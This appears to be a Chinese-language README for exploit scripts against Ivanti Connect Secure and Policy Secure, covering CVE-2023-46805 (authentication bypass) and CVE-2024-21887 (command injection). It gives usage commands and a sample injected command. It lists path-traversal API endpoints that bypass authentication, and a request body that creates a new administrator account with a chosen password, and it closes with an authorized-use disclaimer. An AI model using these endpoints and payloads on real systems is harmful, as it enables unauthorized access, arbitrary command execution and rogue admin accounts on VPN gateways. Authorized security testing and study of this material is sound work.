Ivanti ICS 9.x、22.x 及 Ivanti Policy Secure 的 Web 组件中存在一个认证绕过漏洞,允许远程攻击者绕过控制检查访问受限资源。
用法: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

注意:
chmod +x CVE-2023-46805.sh
需要 app curl + json_pp
如果存在漏洞,你应该能看到一些内容:

Ivanti Connect Secure (9.x, 22.x) 和 Ivanti Policy Secure 的 Web 组件中存在一个命令注入漏洞,允许经过身份验证的管理员发送特制请求并在设备上执行任意命令。
用法: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"
如果存在漏洞,你应该能看到一些内容并且你的 payload 应该生效:

注意:
chmod +x CVE-2024-21887.sh
需要 app curl, xxd, tr & sed
/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users
/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users
-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'
致谢:https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis
更多关于我 ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ 免责声明: 重要提示:本脚本仅供教育、道德测试和合法使用!未经明确许可,请勿在任何系统或网络上使用。未经授权访问计算机系统和网络是违法的,被发现进行未经授权活动的用户将面临法律制裁。作者对因滥用此脚本造成的任何损害概不负责。